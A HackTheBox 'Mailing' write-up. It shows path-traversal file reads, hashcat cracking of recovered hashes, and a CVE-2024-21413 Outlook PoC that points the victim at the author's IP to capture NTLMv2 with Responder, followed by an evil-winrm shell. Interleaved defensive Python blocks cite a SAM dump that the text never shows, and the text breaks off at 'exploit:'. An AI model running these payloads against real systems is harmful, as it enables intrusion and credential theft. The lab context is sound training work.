HackTheBox-Machines Mailing Writeup

kazma, founder and president of the NCKU Information Security Club

My first time attacking a HackTheBox Windows machine~~~

Exploitation

nmap

└──╼ [★]$ nmap -sV 10.129.241.62
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 07:36 CDT
Nmap scan report for 10.129.241.62
Host is up (0.086s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
80/tcp open http Microsoft IIS httpd 10.0
110/tcp open pop3 hMailServer pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
587/tcp open smtp hMailServer smtpd
993/tcp open ssl/imap hMailServer imapd
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.73 seconds

Cool, lots of services are open.
Let's check the hostname with whatweb:

└──╼ [★]$ whatweb 10.129.241.62
http://10.129.241.62 [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.129.241.62], Microsoft-IIS[10.0], RedirectLocation[http://mailing.htb], Title[Documento movido], X-Powered-By[ASP.NET]
ERROR Opening: http://mailing.htb - no address for mailing.htb

Add it to /etc/hosts:

└──╼ [★]$ echo "10.129.241.62 mailing.htb" | sudo tee -a /etc/hosts
10.129.241.62 mailing.htb

Fuzz paths with ffuf:

└──╼ [★]$ ffuf -u http://mailing.htb/FUZZ -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://mailing.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

assets [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 120ms]
:: Progress: [100000/100000] :: Job [1/1] :: 511 req/sec :: Duration: [0:04:47] :: Errors: 0 ::

We see an assets directory with status 301; just keep it in mind for now.
The site has quite a lot of content, including a link to https://www.hmailserver.com/ with many features, but at the bottom of the home page there is a download function; hovering the mouse over the button shows:
[Screenshot: hover]
We can try to fetch other files, for example http://mailing.htb/download.php?file=../../../../../../../Windows/System32/Drivers/etc/hosts retrieves the Windows hosts file:

└──╼ [★]$ cat hosts 
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost

127.0.0.1 mailing.htb
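The traversal works because the download handler joins whatever the file parameter says onto its own directory. As an added illustration (not the site's download.php, which is PHP; this is a Python rendering of the same pattern, with the download directory /srv/www/downloads assumed), here is the vulnerable resolution beside a hardened one that rejects the payloads used in this write-up:

```python
import posixpath
from urllib.parse import unquote

# Assumed download directory; the real site's layout is not known from the write-up.
DOWNLOAD_DIR = "/srv/www/downloads"


def naive_resolve(base_dir: str, requested: str) -> str:
    """The vulnerable pattern: concatenate the user-controlled name under base_dir.

    Nothing stops '..' segments, so the result can point anywhere on the disk.
    """
    return base_dir.rstrip("/") + "/" + unquote(requested).replace("\\", "/")


def where_it_points(base_dir: str, requested: str) -> str:
    """Lexically normalised view of what naive_resolve would actually open."""
    return posixpath.normpath(naive_resolve(base_dir, requested))


def escapes_base(base_dir: str, path: str) -> bool:
    """True when the normalised path is not inside base_dir."""
    base = posixpath.normpath(base_dir)
    return not posixpath.normpath(path).startswith(base + "/")


def safe_resolve(base_dir: str, requested: str):
    """Return the path to serve, or None when the request tries to leave base_dir.

    Percent-decode first (the write-up's second payload used %20), treat
    backslashes as separators (Windows accepts both), collapse '.' and '..'
    lexically, then refuse absolute, drive-qualified, NUL-containing, or
    still-upward names. The check is lexical, so it needs no filesystem access.
    """
    name = unquote(requested).replace("\\", "/")
    if name.startswith("/") or ":" in name or "\x00" in name:
        return None
    norm = posixpath.normpath(name)
    if norm in (".", "..") or norm.startswith("../"):
        return None
    return posixpath.join(base_dir.rstrip("/"), norm)


# Payloads from the write-up, plus one benign request for contrast.
HOSTS_PAYLOAD = "../../../../../../../Windows/System32/Drivers/etc/hosts"
INI_PAYLOAD = "../../../../../../Program%20Files%20(x86)/hMailServer/Bin/hMailServer.ini"
BENIGN = "brochures/../catalogue.pdf"

if __name__ == "__main__":
    for req in (HOSTS_PAYLOAD, INI_PAYLOAD, BENIGN):
        print(f"{req!r}: naive -> {where_it_points(DOWNLOAD_DIR, req)} "
              f"(escapes={escapes_base(DOWNLOAD_DIR, naive_resolve(DOWNLOAD_DIR, req))}), "
              f"safe -> {safe_resolve(DOWNLOAD_DIR, req)}")
```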

Since we've now confirmed arbitrary file download, the first thing we're interested in is probably the config file of the hMailServer mentioned above, so let's first look up what hMailServer is:

hMailServer was a free email server for Windows created by Martin Knafve. It ran as a Windows service and includes administration tools for management and backup. It had support for IMAP, POP3, and SMTP email protocols. It could use external database engines such as MySQL, MS SQL or PostgreSQL, or an internal MS SQL Compact Edition engine to store configuration and index data. The actual email messages were stored on disk in a raw MIME format. As of January 15th, 2022, active support and development were officially halted, although version 5.6 will continue to receive updates for critical bugs.

In short, it is a free Windows email server that supports IMAP, POP3 and SMTP.
Searching for the default path of the hMailServer config file:

Where is the hMailServer.ini file located?
C:\Program Files\hMailServer\Bin
Open hMailServer.ini, typically located under C:\Program Files\hMailServer\Bin. Restart the hMailServer service.

Let's try putting the path above into our payload:
http://mailing.htb/download.php?file=../../../../../../Program Files/hMailServer/Bin/hMailServer.ini
The file was not found:
[Screenshot: default]
Trying again with http://mailing.htb/download.php?file=../../../../../../Program%20Files%20(x86)/hMailServer/Bin/hMailServer.ini found it; let's look at the contents of hMailServer.ini:

└──╼ [★]$ cat hMailServer.ini 
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

We see a password in ciphertext form: 0a9f8ad8bf896b501dde74f08efd7e4c
We can use hash-identifier to check what kind of hash it is:

└──╼ [★]$ hash-identifier 0a9f8ad8bf896b501dde74f08efd7e4c
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

It looks like MD5, so let's try cracking it with hashcat:

└──╼ [★]$ hashcat '0a9f8ad8bf896b501dde74f08efd7e4c' -m 0 -a 0 -o output.txt /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-DO-Regular, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: DO-Regular, 3937/7938 MB (992 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 0a9f8ad8bf896b501dde74f08efd7e4c
Time.Started.....: Thu Aug 15 20:46:36 2024 (4 secs)
Time.Estimated...: Thu Aug 15 20:46:40 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 3672.2 kH/s (0.16ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]

Started: Thu Aug 15 20:46:25 2024
Stopped: Thu Aug 15 20:46:41 2024

Oh no, it failed. Let's try an online tool instead:
[Screenshot: fail]
Failed again? Going back to look, I realized hMailServer.ini actually contains two passwords:

AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
Password=0a9f8ad8bf896b501dde74f08efd7e4c

Facepalm. Switch to cracking the admin password instead:

└──╼ [★]$ hashcat '841bb5acfa6779ae432fd7a4e6600ba7' -m 0 /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-DO-Regular, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: DO-Regular, 3937/7938 MB (992 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 841bb5acfa6779ae432fd7a4e6600ba7
Time.Started.....: Thu Aug 15 21:01:42 2024 (3 secs)
Time.Estimated...: Thu Aug 15 21:01:45 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 3248.8 kH/s (0.18ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7563264/14344385 (52.73%)
Rejected.........: 0/7563264 (0.00%)
Restore.Point....: 7561216/14344385 (52.71%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: homie g 1 -> home38119

Started: Thu Aug 15 21:01:40 2024
Stopped: Thu Aug 15 21:01:45 2024

And the admin password was found right away...
841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
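Why the admin hash fell so fast: hMailServer.ini stores AdministratorPassword as an unsalted MD5 digest, so each dictionary guess costs one hash, while the [Database] Password is flagged PasswordEncryption=1, an encrypted value rather than a hash, which is why cracking it as MD5 went nowhere. As an added audit check (my code, not hMailServer's), this parses the INI retrieved above and reports what a defender would act on; the candidate list is constructed for the demonstration:

```python
import configparser
import hashlib
import re

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")

# The [Security] and [Database] sections of the hMailServer.ini shown above, as sample input.
SAMPLE_INI = """\
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
"""


def parse_hmailserver_ini(text: str) -> configparser.ConfigParser:
    """hMailServer.ini is plain INI; keep key case so lookups read like the file."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def audit_hmailserver_ini(text: str, candidates) -> dict:
    """Triage an exposed hMailServer.ini: what does it hand to whoever downloaded it?

    - AdministratorPassword is a bare 32-hex MD5 with no salt, so a dictionary
      word is recovered in seconds (exactly what hashcat showed above).
    - [Database] Password with PasswordEncryption=1 is stored encrypted, not
      hashed, so it is the wrong target for a hash cracker in the first place.
    """
    cp = parse_hmailserver_ini(text)
    admin = cp.get("Security", "AdministratorPassword", fallback="")
    report = {
        "admin_hash_is_unsalted_md5": bool(HEX32.match(admin)),
        "admin_password_guessed": None,
        "db_password_is_encrypted_not_hashed":
            cp.get("Database", "PasswordEncryption", fallback="0") == "1",
    }
    if report["admin_hash_is_unsalted_md5"]:
        for cand in candidates:
            if hashlib.md5(cand.encode("utf-8")).hexdigest() == admin.lower():
                report["admin_password_guessed"] = cand
                break
    return report


if __name__ == "__main__":
    # Constructed mini-wordlist; rockyou.txt would play the same role.
    print(audit_hmailserver_ini(SAMPLE_INI, ["password", "admin", "homenetworkingadministrator"]))
```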
Next, going back to the earlier nmap scan, we can see quite a few services are open, one of which is pop3; let's look up what that is:

Post Office Protocol (English: Post Office Protocol, abbreviation: POP) is a member of the TCP/IP protocol family and was first defined by RFC 1939 issued in May 1996. This protocol is primarily used to support remote management of email on the server using a client. The latest version is POP3, whose full name is "Post Office Protocol - Version 3", and the POP3 protocol that provides SSL encryption is called POP3S.

Simply put, it is a protocol for managing mail remotely; Wikipedia also documents how to use it:
[Screenshot: pop3]
So we can try logging in with the credentials we just cracked:

└──╼ [★]$ telnet 10.129.241.62 110
Trying 10.129.241.62...
Connected to 10.129.241.62.
Escape character is '^]'.
+OK POP3
USER [email protected]
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
stat
+OK 0 0
list
+OK 0 messages (0 octets)
.

It's empty QQ
At this point I consulted solutions online and found that we can exploit a Microsoft Office Outlook CVE from this year. Lesson learned here: always check for CVEs first.
https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

This script presents a proof of concept (PoC) for CVE-2024-21413, a significant security vulnerability discovered in Microsoft Outlook with a CVSS of 9.8. Termed the #MonikerLink bug, this vulnerability has far-reaching implications, including the potential leakage of local NTLM information and the possibility of remote code execution. Moreover, it highlights an attack vector that could bypass Office Protected View, thereby extending its threat to other Office applications.

This vulnerability mainly leaks NTLM credentials as its path to RCE, so let's also take a look at what NTLM is:

Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users’ identity and protect the integrity and confidentiality of their activity. At its core, NTLM is a single sign on (SSO) tool that relies on a challenge-response protocol to confirm the user without requiring them to submit a password.

Despite known vulnerabilities, NTLM remains widely deployed even on new systems in order to maintain compatibility with legacy clients and servers. While NTLM is still supported by Microsoft, it has been replaced by Kerberos as the default authentication protocol in Windows 2000 and subsequent Active Directory (AD) domains.

NTLM, simply put, is an SSO tool that lets users authenticate without being prompted for a password, but it is gradually being replaced by Kerberos.
Before launching the attack we need to start capturing traffic, and we can use the network penetration-testing tool Responder to help:

└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.26]
Responder IPv6 [dead:beef:2::1018]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-I72N069R99L]
Responder Domain Name [HO9K.LOCAL]
Responder DCE-RPC Port [46780]

[+] Listening for events...

Once it's running it starts listening; now execute our payload:

└─$ python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --url "\\10.10.14.26" --subject XD

CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / [email protected]

✅ Email sent successfully.

After sending it, we receive the following:

[SMB] NTLMv2-SSP Client : 10.10.14.26
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:95de498996a31a8c:D2BABC773FF653EE285D33E6FE5493A6:010100000000000080F2298488B6DA015D1DCBB264E2490C0000000002000800530059005500490001001E00570049004E002D005A004F0042005000340036004D0038004B005600410004003400570049004E002D005A004F0042005000340036004D0038004B00560041002E0053005900550049002E004C004F00430041004C000300140053005900550049002E004C004F00430041004C000500140053005900550049002E004C004F00430041004C000700080080F2298488B6DA0106000400020000000800300030000000000000000000000000200000C9E5BC0C7D84E948E12CF5D180E24C511C66B448EF8DB310790EDB6AD72669FF0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370031000000000000000000

Then we can use hashcat to try to crack this NTLMv2 hash:

└─$ hashcat -m 5600 -a 0 -o output.txt ntlm.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12400, 2918/5901 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385


Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MAYA::MAILING:95de498996a31a8c:d2babc773ff653ee285d...000000
Time.Started.....: Fri Aug 16 17:25:41 2024 (2 secs)
Time.Estimated...: Fri Aug 16 17:25:43 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3185.0 kH/s (0.81ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5935104/14344385 (41.38%)
Rejected.........: 0/5935104 (0.00%)
Restore.Point....: 5931008/14344385 (41.35%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: m6161 -> m3808w

Started: Fri Aug 16 17:25:22 2024
Stopped: Fri Aug 16 17:25:44 2024

┌──(kazma㉿kali)-[~/hack_the_box/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ cat output.txt
MAYA::MAILING:95de498996a31a8c:d2babc773ff653ee285d33e6fe5493a6:...:m4y4ngs4ri

Password found: m4y4ngs4ri
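Why the captured NetNTLMv2 was crackable offline: the value Responder logged is HMAC-MD5(HMAC-MD5(NT hash, UPPER(user) || domain), server challenge || client blob), and every input except the NT hash crosses the wire in the clear, so each candidate password costs two HMACs and hashcat can test millions per second. Added example (my code, not Responder's or hashcat's): a pure-Python MD4 (hashlib's md4 is often unavailable under OpenSSL 3), the NT hash checked against the SAM value dumped later in this write-up, and the captured line above verified against the cracked password; the blob is the one Responder printed, split into its AV_PAIR fields:

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320; the NT hash is MD4 of the UTF-16LE password."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    round3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for rnd in range(3):
            for i in range(16):
                if rnd == 0:
                    k, s, fn, add = i, (3, 7, 11, 19)[i % 4], f, 0
                elif rnd == 1:
                    k, s, fn, add = (i % 4) * 4 + i // 4, (3, 5, 9, 13)[i % 4], g, 0x5A827999
                else:
                    k, s, fn, add = round3_order[i], (3, 9, 11, 15)[i % 4], h, 0x6ED9EBA1
                a = rotl((a + fn(b, c, d) + x[k] + add) & MASK, s)
                a, b, c, d = d, a, b, c  # rotate the register roles for the next step
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the value stored in the SAM."""
    return md4(password.encode("utf-16le"))


def ntproofstr(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NT hash, UPPER(user) || domain), challenge || blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, challenge + blob, hashlib.md5).digest()


def verify_candidate(hash_line: str, password: str) -> bool:
    """Test one password against a Responder / hashcat -m 5600 line: user::domain:challenge:proof:blob."""
    user, _, domain, chal, proof, blob = hash_line.strip().split(":")
    got = ntproofstr(password, user, domain, bytes.fromhex(chal), bytes.fromhex(blob))
    return hmac.compare_digest(got, bytes.fromhex(proof))


# The client blob from the Responder line above, split by AV_PAIR so its cleartext
# content is visible: Responder's fake host WIN-ZOBP46M8KVA / SYUI.LOCAL and the SPN.
BLOB = (
    "0101000000000000" "80F2298488B6DA01" "5D1DCBB264E2490C" "00000000"  # header, timestamp, client nonce
    "02000800" "5300590055004900"                                          # MsvAvNbDomainName "SYUI"
    "01001E00" "570049004E002D005A004F0042005000340036004D0038004B0056004100"  # MsvAvNbComputerName
    "04003400" "570049004E002D005A004F0042005000340036004D0038004B0056004100"
               "2E0053005900550049002E004C004F00430041004C00"             # MsvAvDnsDomainName
    "03001400" "53005900550049002E004C004F00430041004C00"                  # MsvAvDnsComputerName
    "05001400" "53005900550049002E004C004F00430041004C00"                  # MsvAvDnsTreeName
    "07000800" "80F2298488B6DA01"                                          # MsvAvTimestamp
    "06000400" "02000000"                                                  # MsvAvFlags
    "08003000" "30000000000000000000000000200000"
               "C9E5BC0C7D84E948E12CF5D180E24C511C66B448EF8DB310790EDB6AD72669FF"  # MsvAvSingleHost
    "0A001000" "00000000000000000000000000000000"                          # MsvChannelBindings
    "09002000" "63006900660073002F00310030002E00310030002E00310034002E0037003100"  # MsvAvTargetName
    "00000000" "00000000"                                                  # MsvAvEOL + padding
)
CAPTURED = "maya::MAILING:95de498996a31a8c:D2BABC773FF653EE285D33E6FE5493A6:" + BLOB

if __name__ == "__main__":
    print("NT hash of m4y4ngs4ri:", nt_hash("m4y4ngs4ri").hex())
    print("captured line matches m4y4ngs4ri:", verify_candidate(CAPTURED, "m4y4ngs4ri"))
```

The defensive takeaway is that nothing in this exchange protects a weak password: only the NT hash is secret, so the mitigations are strong passwords, disabling NTLM where possible, and blocking outbound SMB so an Outlook client never reaches an attacker's listener.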
Now that we have credentials, let me introduce a great tool called evil-winrm, along with its cool banner image and description:
[Image: evil-winrm]

This shell is the ultimate WinRM shell for hacking/pentesting.

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

It is based mainly in the WinRM Ruby library which changed its way to work since its version 2.0. Now instead of using WinRM protocol, it is using PSRP (Powershell Remoting Protocol) for initializing runspace pools as well as creating and processing pipelines.

In short, evil-winrm is a remote management tool for Windows that speaks the PSRP protocol to WinRM on port 5985.
Usage:

└─$ evil-winrm -i 10.129.231.40 -u maya -p m4y4ngs4ri

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> ls


Directory: C:\Users\maya\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/13/2024 4:49 PM WindowsPowerShell
-a---- 4/11/2024 1:24 AM 807 mail.py
-a---- 3/14/2024 4:30 PM 557 mail.vbs

We're in! Finally...

*Evil-WinRM* PS C:\Users\maya> cd Desktop
*Evil-WinRM* PS C:\Users\maya\Desktop> ls


Directory: C:\Users\maya\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2024 7:34 PM 2350 Microsoft Edge.lnk
-ar--- 8/16/2024 10:41 AM 34 user.txt


*Evil-WinRM* PS C:\Users\maya\Desktop> cat user.txt

The user flag is under Desktop.
Next we can wander around for a while, and then, like me, you'll give up and peek at the solution, discovering that the installed LibreOffice version has a CVE. Who could find that on their own?

*Evil-WinRM* PS C:\Program Files\LibreOffice\readmes> cat readme_es.txt


======================================================================

Léame de LibreOffice 7.4

======================================================================

exploit:
